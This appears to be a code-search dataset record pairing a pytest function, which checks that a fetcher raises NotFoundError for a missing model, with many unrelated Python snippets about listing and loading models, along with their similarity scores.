\"application/json\",\n \"Authorization\": \"Bearer \" + str(auth_token),\n }\n response = requests.request(\n \"POST\", API_REQUEST_URL, headers = headers, data = json.dumps(payload)\n )\n status_code = response.status_code\n try:\n response_json = response.json()\n except Exception as e:\n response.raise_for_status()\n response_json[\"status_code\"] = status_code\n return response_json\n except Exception as e:\n print((traceback.print_exc()))\n return exception_return(e, status_code)", "def find_models(\n self, artifact_type: str, match_condition: Dict[str, Any], return_model_id: bool = False\n ) -> List[Union[Tuple[MODEL_TYPE, Dict[str, Any]], Tuple[MODEL_TYPE, Dict[str, Any], int]]]:\n documents = self.find_artifacts(artifact_type, match_condition)\n results = []\n for document in documents:\n model = create_model(document['params'])\n model.load_state_dict(document['artifact'])\n if return_model_id:\n results.append((model, document['params'], document['id']))\n else:\n results.append((model, document['params']))\n return results", "def get_objects_with_cmodel(self, cmodel_uri, type=None):\n uris = self.risearch.get_subjects(modelns.hasModel, cmodel_uri)\n return [self.get_object(uri, type) for uri in uris]", "def ListModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def test_get_projects_returns_projects(fc: fetcher.Fetcher):\n projects = fc.get_projects()\n assert isinstance(projects, list)\n assert isinstance(projects[0], models.Project)", "def InitializeModels(\n model_root,\n models=[],\n verbose=False,\n filter=\"\",\n regex=\"\",\n model_year=[],\n log=True,\n models_path=\"./\",\n):\n # initialize the models\n M = []\n if len(model_year) != 2:\n model_year = None\n max_model_name_len = 0\n if rank == 0 and verbose:\n print(\"\\nSearching for model results in %s\\n\" % model_root)\n for subdir, dirs, files in os.walk(model_root):\n for mname in dirs:\n if len(models) > 0 and mname not in models:\n continue\n pkl_file = os.path.join(models_path, \"%s.pkl\" % mname)\n if os.path.isfile(pkl_file):\n with open(pkl_file, \"rb\") as infile:\n m = pickle.load(infile)\n else:\n try:\n m = ModelResult(\n os.path.join(subdir, mname),\n modelname=mname,\n filter=filter,\n regex=regex,\n model_year=model_year,\n )\n except Exception as ex:\n if log:\n logger.debug(\"[%s]\" % mname, format_exc())\n continue\n M.append(m)\n max_model_name_len = max(max_model_name_len, len(mname))\n break\n M = sorted(M, key=lambda m: m.name.upper())\n\n # assign unique colors\n clrs = il.GenerateDistinctColors(len(M))\n for m in M:\n m.color = clrs.pop(0)\n\n # save model objects as pickle files\n comm.Barrier()\n if rank == 0:\n for m in M:\n pkl_file = os.path.join(models_path, \"%s.pkl\" % m.name)\n with open(pkl_file, \"wb\") as out:\n pickle.dump(m, out, pickle.HIGHEST_PROTOCOL)\n\n # optionally output models which were found\n if rank == 0 and verbose:\n for m in M:\n print((\" {0:>45}\").format(m.name))\n\n if len(M) == 0:\n if verbose and rank == 0:\n print(\"No model results found\")\n comm.Barrier()\n comm.Abort(0)\n\n return M", "def test_get_projects_filters(fc: fetcher.Fetcher, test_project_name):\n projects = fc.get_projects(test_project_name)\n assert isinstance(projects, list)\n assert len(projects) == 1\n assert projects[0].name == test_project_name", "def load_models():\n vectorizer = ModelStorage.objects.all().values_list(\"vectorizer\", flat = True)[0]\n classifier = ModelStorage.objects.all().values_list(\"classifier\", flat = True)[0]\n\n return vectorizer, classifier", "def get_available_models():\n modelpath = os.path.join(os.path.dirname(__file__), \"train\", \"model\")\n models = sorted(item.name.replace(\".py\", \"\").replace(\"_\", \"-\")\n for item in os.scandir(modelpath)\n if not item.name.startswith(\"_\")\n and item.name.endswith(\".py\"))\n return models", "def find_models(page_index=0):\n search_query = {\n 'query': {\n 'match_all': {}\n }\n }\n\n results = find_items('model', search_query, page_index)\n\n records = []\n total_items = results['hits']['total']\n\n # Elastic search always returns results, even when you request a non-existing page.\n # To prevent weird behavior in our api, we check for this and return empty results\n # when you requested an empty page.\n if total_items < page_index * PAGE_SIZE:\n return PagedResultSet(page_index, PAGE_SIZE, total_items, [])\n\n for model in results['hits']['hits']:\n records.append({\n 'name': model['_id'],\n 'date_created': model['_source']['date_created']\n })\n\n return PagedResultSet(page_index, PAGE_SIZE, total_items, records)", "def get_models_for_make_id(self, make_id):\n return self.get('vehicles/GetModelsForMakeId/{}'.format(make_id))", "def get_available_entities_models():\n return ['concat', 'bahdanau', 'luong']", "def ParseModelSetup(\n model_setup, models=[], verbose=False, filter=\"\", regex=\"\", models_path=\"./\"\n):\n if rank == 0 and verbose:\n print(\"\\nSetting up model results from %s\\n\" % model_setup)\n\n # intercept if this is a yaml file\n if model_setup.endswith(\".yaml\"):\n M = _parse_model_yaml(model_setup, cache_path=models_path, only_models=models)\n if rank == 0 and verbose:\n for m in M:\n print((\" {0:>45}\").format(m.name))\n if len(M) == 0:\n print(\"No model results found\")\n comm.Barrier()\n comm.Abort(0)\n return M\n\n # initialize the models\n M = []\n max_model_name_len = 0\n with open(model_setup) as f:\n for line in f.readlines():\n if line.strip().startswith(\"#\"):\n continue\n line = line.split(\",\")\n mname = None\n mdir = None\n model_year = None\n mgrp = \"\"\n if len(line) >= 2:\n mname = line[0].strip()\n mdir = line[1].strip()\n # if mdir not a directory, then maybe path is relative to ILAMB_ROOT\n if not os.path.isdir(mdir):\n mdir = os.path.join(os.environ[\"ILAMB_ROOT\"], mdir).strip()\n if len(line) == 3:\n mgrp = line[2].strip()\n if len(line) == 4:\n model_year = [float(line[2].strip()), float(line[3].strip())]\n max_model_name_len = max(max_model_name_len, len(mname))\n if (len(models) > 0 and mname not in models) or (mname is None):\n continue\n pkl_file = os.path.join(models_path, \"%s.pkl\" % mname)\n if os.path.isfile(pkl_file):\n with open(pkl_file, \"rb\") as infile:\n m = pickle.load(infile)\n else:\n try:\n m = ModelResult(\n mdir,\n modelname=mname,\n filter=filter,\n regex=regex,\n model_year=model_year,\n group=mgrp,\n )\n except Exception as ex:\n logger.debug(\"[%s]\" % mname, format_exc())\n continue\n M.append(m)\n\n # assign unique colors\n clrs = il.GenerateDistinctColors(len(M))\n for m in M:\n m.color = clrs.pop(0)\n\n # save model objects as pickle files\n comm.Barrier()\n if rank == 0:\n for m in M:\n pkl_file = os.path.join(models_path, \"%s.pkl\" % m.name)\n with open(pkl_file, \"wb\") as out:\n pickle.dump(m, out, pickle.HIGHEST_PROTOCOL)\n\n # optionally output models which were found\n if rank == 0 and verbose:\n for m in M:\n print((\" {0:>45}\").format(m.name))\n\n if len(M) == 0:\n if verbose and rank == 0:\n print(\"No model results found\")\n comm.Barrier()\n comm.Abort(0)\n\n return M", "def get_objects(slice, plugin_type, klass, **kwargs):\n try:\n# plugins_modules = settings.PLUGIN_LOADER.plugin_settings.get(plugin_type).get(\"general\").get(\"aggregate_plugins\")[0]\n plugins_modules = PLUGIN_LOADER.plugin_settings.get(plugin_type).get(\"general\").get(\"aggregate_plugins\")[0]\n p_agg = plugins_modules.split('.')[-1]\n p_models_path = '.'.join(plugins_modules.split('.')[:-1])\n try:\n model = getattr(__import__(p_models_path,fromlist=[klass]), klass)\n except: \n try: \n model = getattr(__import__(p_models_path+'.'+klass,fromlist=[klass]), klass)\n except:\n pass \n # Filters resources by slice (will not return any aggregate's resource from another slice)\n objects = model.objects.filter(**kwargs)\n #print \"objects: %s\" % str(objects)\n for obj in objects:\n if not (obj != None and obj.aggregate in slice._get_aggregates()):\n raise Exception\n return objects\n except Exception,e:\n print \"[ERROR] PluginCommunicator could not obtain object. Details: %s \" % str(e)\n return None", "def ListModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def ListModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def load_models(appname):\n return import_module('.models', appname)", "def test_get_hyperflex_server_model_list(self):\n pass", "def simple_models(self, uuid=None):\n \n # Call the Razor RESTful API to get a list of models\n headers = {'content-type': 'application/json'}\n\n if uuid is None:\n r = requests.get(self.url + '/model', headers=headers)\n if r.status_code == 200:\n return json.loads(r.content)\n else:\n return 'Error in request, exited with status code:' + str(r.status_code)\n else:\n r = requests.get(self.url + '/model/' + uuid, headers=headers)\n if r.status_code == 200:\n return self.build_simple_model(json.loads(r.content))\n else:\n return 'Error in request, exited with status code:' + str(r.status_code)", "def iter_models(self):\n return iter(self.model_list)", "def list_models(\n architecture: Optional[str] = typer.Option(None, '-n', '--name', help='Model architecture name'),\n framework: Optional[Framework] = typer.Option(None, '-fw', '--framework', case_sensitive=False,\n help='Framework'),\n engine: Optional[Engine] = typer.Option(None, '-e', '--engine', case_sensitive=False, help='Serving engine'),\n version: Optional[int] = typer.Option(None, '-v', '--version', help='Version'),\n list_all: Optional[bool] = typer.Option(\n False,\n '-a', '--all', is_flag=True,\n help='Display queried models. otherwise, only partial result will be shown.'\n ),\n):\n\n payload = remove_dict_null(\n {'architecture': architecture, 'framework': framework, 'engine': engine, 'version': version}\n )\n with requests.get(f'{app_settings.api_v1_prefix}/model', params=payload) as r:\n model_list = r.json()\n model_view([MLModel.parse_obj(model) for model in model_list], list_all=list_all)", "def _get_embedded_models(self,\n model,\n instance,\n success,\n model_names):\n\n callback = partial(self._handle_embedded_models,\n model=model,\n instance=instance,\n success=success)\n self.get_models(model_names=model_names,\n callback=callback)", "def peak_all_models(self) -> List:\n models = list(self.meta.name)\n print(models)\n return models", "def setup_models(self):\n pass", "def get_seo_models():\n seo_models = []\n for model_name in getattr(settings, setting_name_seo_models, ()):\n if \".\" in model_name:\n # TODO: Test this block\n app_label, model_name = model_name.split(\".\", 1)\n model = models.get_model(app_label, model_name)\n if model:\n seo_models.append(model)\n else:\n app = models.get_app(model_name)\n if app:\n seo_models.extend(models.get_models(app))\n\n return seo_models", "def fetch_ml_model_info() -> ApiResponse:\n return _api_response(settings.ML_MODELS)", "def _get_card_model(self, model: str) -> Any:\n return self.collection.models.byName(model)", "def test_get_model(self) -> None:\n get_model()", "def get_model_queryset(self, request):\n if request.user.is_superuser:\n result = Field.objects.all()\n elif hasattr(request.user, 'farmuser'):\n result = Field.objects.filter(farm_user=request.user.farmuser)\n elif hasattr(request.user, 'farmchilduser'):\n result = Field.objects.filter(farm_user=request.user.farmchilduser.master)\n else:\n return None\n return filter_by_date_updated(request=request, queryset=result)", "def models(self) -> t.List[Model]:\n _models: t.List[Model] = [\n item for item in self._deployables if isinstance(item, Model)\n ]\n return _models", "def get_models():\n param = {'C': 0.7678243129497218, 'penalty': 'l2'}\n model1 = LogisticRegression(**param)\n\n param = {'n_neighbors': 8}\n model2 = KNeighborsClassifier(**param)\n\n param = {'C': 1.7, 'kernel': 'linear', 'probability':True}\n model3 = SVC(**param)\n\n param = {'criterion': 'gini', 'max_depth': 3, 'max_features': 2, 'min_samples_leaf': 3}\n model4 = DecisionTreeClassifier(**param)\n\n param = {'learning_rate': 0.05, 'n_estimators': 150}\n model5 = AdaBoostClassifier(**param)\n\n param = {'learning_rate': 0.01, 'n_estimators': 100}\n model6 = GradientBoostingClassifier(**param)\n\n model7 = RandomForestClassifier()\n\n model8 = ExtraTreesClassifier()\n\n models = {'LR':model1, 'KNN':model2, 'SVC':model3, 'DT':model4,\n 'ADa':model5, 'GB':model6, 'RF':model7, 'ET':model8\n }\n return models", "def models(self):\n return self._base.classes", "def list_models(self):\n \n # Interpret the request data based on the expected row and column structure\n row_template = ['strData']\n col_headers = ['search_pattern']\n \n # Create a Pandas Data Frame for the request data\n self.request_df = utils.request_df(self.request, row_template, col_headers)\n \n # Get the list of models based on the search pattern\n search_pattern = self.request_df.loc[0, 'search_pattern']\n \n # If the search pattern is empty default to all models\n if not search_pattern.strip():\n search_pattern = '*'\n \n # Get the list of models as a string\n models = \"\\n\".join([str(p).split(\"\\\\\")[-1] for p in list(pathlib.Path(self.path).glob(search_pattern))])\n \n # Prepare the output\n self.response = pd.Series(models)\n \n # Finally send the response\n return self.response", "def _filter(self, _model, **kwargs):\n return _model.objects.filter(**kwargs)", "def get_api_models(actor, what):\n\n def _enforce_tuple(x):\n if not isinstance(x, tuple):\n return (x,)\n return x\n\n def _do_get(api):\n result = _enforce_tuple(getattr(api, what, ()))\n for a in _enforce_tuple(api.apis or ()):\n result = result + _do_get(a)\n return result\n return tuple(set(_do_get(actor)))", "def list_models(self, sort: bool = True, limit: int | None = None) -> Iterator[ExecutableModelSpace]:\n return self._strategy.list_models(sort=sort, limit=limit)", "def download_all_models() -> None:\n model_keys = ModelInfo.get_all_models()\n for model_key in model_keys:\n download_model(model_key)", "def get_model_list():\n with open(os.path.join(MODELS_FOLDER, \"models.json\"), \"r\") as model_file:\n model_list = json.load(model_file)\n return model_list", "def find_crystal_models(self, reflections, experiments):\n raise NotImplementedError()", "def for_app_models(self, *args, **kwargs):\n content_types = []\n for app_model in args:\n app, model = app_model.split(\".\")\n content_types.append(ContentType.objects.get(app_label=app, \n model=model))\n return self.for_content_types(content_types, **kwargs)", "def get_queryset(self):\n request = self.request\n # Allow pages to be filtered to a specific type\n page_type = request.GET.get('type', 'wagtailcore.Page')\n try:\n models = page_models_from_string(page_type)\n except (LookupError, ValueError):\n raise BadRequestError(\"type doesn't exist\")\n if not models:\n models = [Page]\n if len(models) == 1:\n qs = models[0].objects.all()\n else:\n qs = Page.objects.all()\n # Filter pages by specified models\n qs = filter_page_type(qs, models)\n if self.revision_wanted is not None or self.is_preview:\n # Get pages that the current user has permission to publish\n qs = publishable_pages(self.user, qs)\n else:\n # Get live pages that are not in a private section\n qs = qs.live().public()\n # Filter by site\n return qs.descendant_of(request.site.root_page, inclusive=True)", "def list(self, project_id):\n endpoint = \"/project/{}/model\".format(project_id)\n return self._get(endpoint, _ModelSchema(many=True))", "def test_model_get(self):\n response = self.client().get('/model')\n self.assertEqual(response.status_code, 200)\n loaded_model = Model.from_json(response.data.decode())\n self.assertEqual(loaded_model, self.data_manipulation.get_latest_model())\n\n # All versions are removed\n self.data_manipulation.versions = {}\n\n other_response = self.client().get('/model')\n self.assertEqual(other_response.status_code, 404)", "def get_model_queryset(model, request=None):\n if request:\n preview_draft = ('preview' in request.GET and 'draft' in request.GET)\n edit_mode = ('edit' in request.GET or request.session.get('cms_edit', False))\n if preview_draft or edit_mode: \n return model.objects.drafts()\n # Default case / moderator is used but there is no request\n return model.objects.public()", "def get_models_query():\n query = db.session.query(Products.model).distinct()\n return query", "def load_models_by_type(model_type):\n\n # loading the models for each language supported\n return [(lang_id, load_model(lang_id, model_type)) for lang_id in language_id_to_code_mapper]", "def list_dashdb_models(self, fields=['model_name']):\n\t\tmodels = dbop.get_models(self, model_type='DashDB In-database Model', fields=fields)\n\t\treturn models", "def ListModels(self, request, timeout, metadata=None, with_call=False, protocol_options=None):\n raise NotImplementedError()", "def get_object_models(self):\n parser = WorldParser(self.world_fpath)\n return parser.models", "def list_available_models(cls) -> 'List[PretrainedModelInfo]':\n # recursively walk the subclasses to generate pretrained model info\n list_of_models = model_utils.resolve_subclass_pretrained_model_info(cls)\n return list_of_models" ]
[ "0.72766924", "0.66285986", "0.6556921", "0.6551836", "0.6296319", "0.626473", "0.6252031", "0.61985433", "0.61647654", "0.61226976", "0.61226976", "0.607028", "0.60465264", "0.6035401", "0.60337895", "0.59634507", "0.5959686", "0.5941662", "0.5922241", "0.59054995", "0.5881448", "0.58800495", "0.5876396", "0.5874023", "0.5873466", "0.58549595", "0.58486265", "0.58384407", "0.5836732", "0.5836436", "0.583402", "0.5810582", "0.5794254", "0.5777772", "0.5775588", "0.5757563", "0.5739123", "0.57334095", "0.56720334", "0.5661378", "0.5652023", "0.56377786", "0.5631584", "0.5621608", "0.5618088", "0.560951", "0.55985975", "0.5583852", "0.55837435", "0.55816126", "0.55813855", "0.5564015", "0.5559904", "0.5555106", "0.55467445", "0.5535004", "0.5524872", "0.55178165", "0.55164075", "0.55019075", "0.5494417", "0.5488901", "0.54820275", "0.547317", "0.5472669", "0.5472669", "0.54691017", "0.5454411", "0.54493785", "0.5444251", "0.54280853", "0.54223126", "0.5408609", "0.5398911", "0.5388666", "0.53881556", "0.53837216", "0.53810376", "0.53736496", "0.5360683", "0.5355761", "0.5354801", "0.53464097", "0.53386873", "0.53374624", "0.533371", "0.53264904", "0.5297019", "0.5296494", "0.52770877", "0.5276739", "0.5269682", "0.52637875", "0.5263602", "0.52500075", "0.52416027", "0.5228783", "0.5222408", "0.52181983", "0.52078575" ]
0.75294465
0
fetcher.get_models() should throw if a model is not found.
def test_get_models_throws_if_model_does_not_exist(fc: fetcher.Fetcher, project, model): with pytest.raises(exceptions.NotFoundError) as exc: fc.get_models(project=project, model=model) assert "An error occured while getting models." in str(exc.value)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_get_models_returns_models(fc: fetcher.Fetcher):\n ml = fc.get_models()\n assert isinstance(ml, list)\n assert isinstance(ml[0], models.LookmlModel)", "def get_models(self, app_name):\n try:\n models = list(apps.get_app_config(app_name).get_models())\n return models\n except:\n raise LookupError(f\"this is no such app {app_name}\")", "def GetModels(self, request, context):\n context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)", "def _get_models(self, req, is_detail):\n context = req.environ['meteos.context']\n\n search_opts = {}\n search_opts.update(req.GET)\n\n # Remove keys that are not related to model attrs\n search_opts.pop('limit', None)\n search_opts.pop('offset', None)\n sort_key = search_opts.pop('sort_key', 'created_at')\n sort_dir = search_opts.pop('sort_dir', 'desc')\n\n models = self.engine_api.get_all_models(\n context, search_opts=search_opts, sort_key=sort_key,\n sort_dir=sort_dir)\n\n limited_list = common.limited(models, req)\n\n if is_detail:\n models = self._view_builder.detail_list(req, limited_list)\n else:\n models = self._view_builder.summary_list(req, limited_list)\n return models", "def test_get_models_throws_if_project_does_not_exist(\n fc: fetcher.Fetcher, project, model\n):\n with pytest.raises(exceptions.NotFoundError) as exc:\n fc.get_models(project=project, model=model)\n assert \"An error occured while getting projects.\" in str(exc.value)", "def test_get_model_method_with_missing_model(self):\n # arrange\n model_manager = ModelManager()\n\n model_manager.load_model(\"tests.mocks.MLModelMock\")\n\n # act\n exception_raised = False\n exception_message = \"\"\n model = None\n try:\n model = model_manager.get_model(qualified_name=\"asdf\")\n except Exception as e:\n exception_raised = True\n exception_message = str(e)\n\n # assert\n self.assertTrue(exception_raised)\n self.assertTrue(exception_message == \"Instance of model 'asdf' not found in ModelManager.\")", "def load_models(self, models, iteration = None):\n print(\"NOT IMPLEMENTED YET\")", "def models(self):\n \n # Call the Razor RESTful API to get a list of models\n headers = {'content-type': 'application/json'}\n r = requests.get(self.url + '/model', headers=headers)\n\n # Check the status code and return appropriately\n if r.status_code == 200:\n return json.loads(r.content)\n else:\n return 'Error in request, exited with status code:' + str(r.status_code)", "def load_models(model_name=\"\", path=\"\", read_grains=False, **kwargs):\n models = pc.load_models('{0}{1}'.format(path, model_name), read_grains=read_grains, **kwargs)\n models_return = []\n for m in models:\n if m.n_zones > 1:\n models_return.append(m)\n else:\n # log failed model\n pass\n return models_return", "def get_models_for_make(self, make):\n return self.get('vehicles/GetModelsForMake/{}'.format(make))", "def get_models(self):\n self.load()\n return self._models", "def fetch_models(self):\n if self.model_pool is None:\n print(\"Please train a model first.\", file=STDE)\n EXIT(1)\n else:\n return [copy.deepcopy(m.steps[-1][-1]) for m in self.model_pool]", "def get_models(self, model_names, callback):\n models = self.get_collection('_model')\n models.find(spec={'_id': {'$in': tuple(model_names)}}).to_list(\n callback=callback)", "def check_models():\n # Check if Models exist\n if request.method == 'GET':\n if models_exist():\n return jsonify({'message': 'models found'})\n else:\n return jsonify({'message': 'one or more models missing'}), 409\n\n # Post Method, download models\n else:\n task = download_models.apply_async()\n task_url = url_for('model_download_status', task_id=task.id)\n return jsonify({'message': 'download started', 'location': task_url}), 202, {'Location': task_url}", "def try_models(self):\n result = os.system(\"python try_models.py\")\n return result == 0", "def ez_get_models(auth_token, options = None):\n status_code = 500\n try:\n API_REQUEST_URL = API_URL + \"/ez_get_models\"\n payload = {\n \"options\": options\n }\n headers = {\n \"Content-Type\": \"application/json\",\n \"Authorization\": \"Bearer \" + str(auth_token),\n }\n response = requests.request(\n \"POST\", API_REQUEST_URL, headers = headers, data = json.dumps(payload)\n )\n status_code = response.status_code\n try:\n response_json = response.json()\n except Exception as e:\n response.raise_for_status()\n response_json[\"status_code\"] = status_code\n return response_json\n except Exception as e:\n print((traceback.print_exc()))\n return exception_return(e, status_code)", "def GetModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def test_coupledmodels_get(self):\n pass", "def get_model_by_name(self, model_name):\n models = ModelDirectory.get_model_by_name(model_name, pipeline=self)\n return models", "def get_models(make):\n api_url = 'https://api.edmunds.com/api/vehicle/v2/{}/models?fmt=json&api_key={}'\\\n .format(make, API_KEY)\n r = requests.get(api_url).json()\n all_models = [model['name'] for model in r['models']]\n return all_models", "def GetModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def _retrieve_models(local=True):\n # Check if the download folder exists\n def _get_meta_data(model_name, file):\n return {\n \"data\": {\n \"id\": model_name,\n \"name\": model_name,\n \"description\": model_name,\n \"filename\": os.path.join(\n app.config[\"DOWNLOAD_DIR\"], file),\n \"created\": time.ctime(os.path.getctime(\n os.path.join(\n app.config[\"DOWNLOAD_DIR\"],\n file))),\n \"modified\": time.ctime(os.path.getmtime(\n os.path.join(\n app.config[\"DOWNLOAD_DIR\"],\n file)))\n }\n }\n\n if not os.path.exists(app.config[\"DOWNLOAD_DIR\"]):\n os.makedirs(app.config[\"DOWNLOAD_DIR\"])\n\n if not local:\n # Fetch from a Nexus-hosted catalog\n resources = app.forge.search({\"type\": \"EmbeddingModel\"})\n for resource in resources:\n app.models[resource.name] = {\n \"data\": digest_model_data(resource),\n }\n app.forge.download(\n resource, \"distribution.contentUrl\",\n app.config[\"DOWNLOAD_DIR\"])\n\n pipeline_path = os.path.join(\n app.config[\"DOWNLOAD_DIR\"],\n resource.distribution.name)\n app.models[resource.name][\"object\"] = EmbeddingPipeline.load(\n pipeline_path,\n embedder_interface=GraphElementEmbedder,\n embedder_ext=\"zip\")\n\n # Clear the downloads dir\n for f in os.listdir(app.config[\"DOWNLOAD_DIR\"]):\n try:\n os.remove(os.path.join(app.config[\"DOWNLOAD_DIR\"], f))\n except Exception:\n shutil.rmtree(os.path.join(app.config[\"DOWNLOAD_DIR\"], f))\n else:\n # Fetch from a local dir\n for (_, dirs, files) in os.walk(app.config[\"DOWNLOAD_DIR\"]):\n for path in dirs + files:\n if path[0] != \".\":\n match = re.match(r\"(.*)\\.zip\", path)\n if match:\n model_name = match.groups()[0]\n else:\n model_name = path\n app.models[model_name] = _get_meta_data(model_name, path)\n pipeline_path = os.path.join(\n app.config[\"DOWNLOAD_DIR\"], path)\n app.models[model_name][\"object\"] = EmbeddingPipeline.load(\n pipeline_path,\n embedder_interface=GraphElementEmbedder,\n embedder_ext=\"zip\")\n break", "def opt_get_all_models_rest_api():\n return retrieve_all_models()", "def ListModels(self, request, context):\n context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)", "def models() -> list[str]:\n return list(models_url.keys())", "def test_get_model(self) -> None:\n get_model()", "def test_get_models(self):\n models = get_models()\n self.assertTrue(len(models) > 6)\n self.assertIn((\"csvimport.Item\", \"csvimport.Item\"), models)", "def get_models():\n\n from lmfit.models import lmfit_models\n models = lmfit_models\n if 'Expression' in models:\n del models['Expression']\n if 'Gaussian-2D' in models:\n del models['Gaussian-2D']\n\n filenames = set()\n\n models_path = pkg_resources.resource_filename('nexpy.api.frills',\n 'models')\n sys.path.append(models_path)\n for file_ in os.listdir(models_path):\n name, ext = os.path.splitext(file_)\n if name != '__init__' and ext.startswith('.py'):\n filenames.add(name)\n\n private_path = os.path.join(os.path.expanduser('~'), '.nexpy', 'models')\n if os.path.isdir(private_path):\n sys.path.append(private_path)\n for file_ in os.listdir(private_path):\n name, ext = os.path.splitext(file_)\n if name != '__init__' and ext.startswith('.py'):\n filenames.add(name)\n\n for name in sorted(filenames):\n try:\n module = importlib.import_module(name)\n models.update(dict((n.strip('Model'), m)\n for n, m in inspect.getmembers(module,\n inspect.isclass)\n if issubclass(m, Model) and n != 'Model'))\n except ImportError:\n pass\n\n return models", "def get_best_models(self, num_models) -> Sequence[tf.keras.Model]:\n pass", "def test_get_model_metadata_method_with_missing_model(self):\n # arrange\n model_manager = ModelManager()\n\n model_manager.load_model(\"tests.mocks.MLModelMock\")\n\n # act\n excpeption_raised = False\n exception_message = None\n try:\n model_metadata = model_manager.get_model_metadata(qualified_name=\"asdf\")\n except Exception as e:\n excpeption_raised = True\n exception_message = str(e)\n\n # assert\n self.assertTrue(excpeption_raised)\n self.assertTrue(exception_message == \"Instance of model 'asdf' not found in ModelManager.\")", "def load_models():\n vectorizer = ModelStorage.objects.all().values_list(\"vectorizer\", flat = True)[0]\n classifier = ModelStorage.objects.all().values_list(\"classifier\", flat = True)[0]\n\n return vectorizer, classifier", "def get_model(model):\n all_models = cmd.get_object_list()\n\n if len(all_models) == 0:\n logging.parser_error('No models are opened.')\n return\n\n model = model.lower()\n\n if model and (model in all_models):\n return model\n\n if len(all_models) > 1:\n logging.parser_error(\"Please specify which model you want to use. {}\".format(all_models))\n return\n\n return all_models[0]", "def get_models(self, ApiId: str, MaxResults: str = None, NextToken: str = None) -> Dict:\n pass", "def GetModels(self, request, timeout, metadata=None, with_call=False, protocol_options=None):\n raise NotImplementedError()", "def get_all_models() -> list:\n\n conn = database_connect()\n if(conn is None):\n return None\n cur = conn.cursor()\n\n try:\n # SQL statement and execute\n sql = \"\"\"SELECT manufacturer, description, modelnumber, weight\n FROM Model\"\"\"\n cur.execute(sql, ())\n\n # Attempt to fetch first row\n result = cur.fetchall()\n\n if result == None:\n cur.close()\n conn.close()\n return []\n\n models = []\n for row in result:\n models.append(\n [row[0], row[1], row[2], row[3]]\n )\n\n cur.close()\n conn.close()\n return models\n except Exception as e:\n print(\"fff\")\n print(e)\n # If login failed, return None\n cur.close()\n conn.close()\n return []", "def test_get_model_method(self):\n # arrange\n model_manager = ModelManager()\n\n model_manager.load_model(\"tests.mocks.MLModelMock\")\n\n # act\n exception_raised = False\n model = None\n try:\n model = model_manager.get_model(qualified_name=\"qualified_name\")\n except Exception as e:\n exception_raised = True\n\n # assert\n self.assertFalse(exception_raised)\n self.assertTrue(type(model) is MLModelMock)", "def load_models(appname):\n return import_module('.models', appname)", "def simple_models(self, uuid=None):\n \n # Call the Razor RESTful API to get a list of models\n headers = {'content-type': 'application/json'}\n\n if uuid is None:\n r = requests.get(self.url + '/model', headers=headers)\n if r.status_code == 200:\n return json.loads(r.content)\n else:\n return 'Error in request, exited with status code:' + str(r.status_code)\n else:\n r = requests.get(self.url + '/model/' + uuid, headers=headers)\n if r.status_code == 200:\n return self.build_simple_model(json.loads(r.content))\n else:\n return 'Error in request, exited with status code:' + str(r.status_code)", "def get_available_models():\n modelpath = os.path.join(os.path.dirname(__file__), \"train\", \"model\")\n models = sorted(item.name.replace(\".py\", \"\").replace(\"_\", \"-\")\n for item in os.scandir(modelpath)\n if not item.name.startswith(\"_\")\n and item.name.endswith(\".py\"))\n return models", "def download_all_models() -> None:\n model_keys = ModelInfo.get_all_models()\n for model_key in model_keys:\n download_model(model_key)", "def test_get_model_names():\n\n names = Instafilter.get_models()\n assert isinstance(names, list)\n assert len(names) > 1", "def fetch_ml_model_info() -> ApiResponse:\n return _api_response(settings.ML_MODELS)", "def get_model_list():\n with open(os.path.join(MODELS_FOLDER, \"models.json\"), \"r\") as model_file:\n model_list = json.load(model_file)\n return model_list", "def _get_embedded_models(self,\n model,\n instance,\n success,\n model_names):\n\n callback = partial(self._handle_embedded_models,\n model=model,\n instance=instance,\n success=success)\n self.get_models(model_names=model_names,\n callback=callback)", "def test_model_get(self):\n response = self.client().get('/model')\n self.assertEqual(response.status_code, 200)\n loaded_model = Model.from_json(response.data.decode())\n self.assertEqual(loaded_model, self.data_manipulation.get_latest_model())\n\n # All versions are removed\n self.data_manipulation.versions = {}\n\n other_response = self.client().get('/model')\n self.assertEqual(other_response.status_code, 404)", "def get(self, request):\n MODEL_NOT_FOUND = -1\n model_ids = self.request.query_params.get(\"ids\", False)\n if not model_ids:\n return HttpResponse(status=400)\n else:\n model_ids = model_ids.split(\",\")\n results = []\n for model_id in model_ids:\n try:\n model = models.ModelRun.objects.get(id=model_id)\n results.append(\n {\"name\": model.name, \"id\": int(model_id), \"status\": model.status}\n if model.is_base or model.public or model.user == self.request.user\n else {\n \"name\": model.name,\n \"id\": int(model_id),\n \"status\": MODEL_NOT_FOUND,\n }\n )\n except models.ModelRun.DoesNotExist:\n results.append({\"id\": int(model_id), \"status\": MODEL_NOT_FOUND})\n\n return Response({\"results\": results})", "def test_get_used_models(fc: fetcher.Fetcher, test_model):\n used_models = fc.get_used_models()\n assert isinstance(used_models, dict)\n assert len(used_models) > 0\n assert all(type(model_name) == str for model_name in used_models.keys())\n assert all(type(query_count) == int for query_count in used_models.values())\n assert test_model[\"name\"] in used_models.keys()", "def _pc_load_models(model_name = None, mod_list = None, n_sample = None, verbose = False, **kwargs):\n\n if model_name is not None:\n mod_list = glob.glob(model_name + '*.out')\n if mod_list is None or mod_list == []:\n pc.log_.error('No model found', calling='load models')\n return None\n if n_sample is not None:\n if n_sample > len(mod_list):\n pc.log_.error('less models {0:d} than n_sample {1:d}'.format(len(mod_list), n_sample),\n calling='load models')\n return None\n mod_list = random.sample(mod_list, n_sample)\n m = []\n for outfile in mod_list:\n if outfile[-4::] == '.out':\n model_name = outfile[0:-4]\n else:\n model_name = outfile\n try:\n cm = 